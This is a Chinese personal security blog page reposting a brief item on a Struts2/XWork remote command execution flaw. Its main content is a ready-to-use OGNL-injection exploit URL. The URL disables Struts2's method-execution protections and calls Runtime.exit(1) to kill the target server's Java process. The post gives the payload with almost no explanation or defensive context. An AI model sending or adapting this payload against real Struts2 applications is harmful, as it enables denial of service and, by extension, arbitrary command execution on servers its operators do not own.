| 孤獨懒人's Blog
孤雁孤飞孤自哀.独静独思独难眠.懒待懒怠懒得失.人来人往人随缘. -孤独懒人 |
| 首页 |
| 分类目录 |
| 学习的地方 |
| 朋友们 |
评论动态
|
 |
| Struts2/XWork 远程命令执行漏洞 | |
|
| |
转载:http://sb3389.com Struts2的是Struts + Webwork * OgnlContext’xwork.MethodAccessor.denyMethodExecution’(默认设置为true) * SecurityMemberAccess’allowStaticMethodAccess’ —————————————————————————————— http://mydomain/MyStruts.action?(‘\u0023_memberAccess[\'allowStaticMethodAccess\']‘)(meh)=true&(aaa)((‘\u0023context[\'xwork.MethodAccessor.den yMethodExecution\']\u003d\u0023foo’)(\u0023foo\u003dnew%20java.lang.Boolean(“false”)))&(asdf)((‘\u0023rt.exit(1)’)(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 发表留言 |
|
| 随机文章 | ||
|
| ||
| [回忆过去] | 发发牢骚 | |
| [网络安全] | Mysql另类盲注中的一些技巧 By oldjun | |
| [回忆过去] | 4月17/日记 | |
| [回忆过去] | 有些事很无奈 | |
| [企业八层网络] | 企业-漏洞测试 | |
|
|
| Copyright (C) 2004-2008 Security Angel Team [sb3389.com] All Rights Reserved.2010 进攻安全—紧急EM:sb3389@qq.com |
| 沪ICP备09091192号 |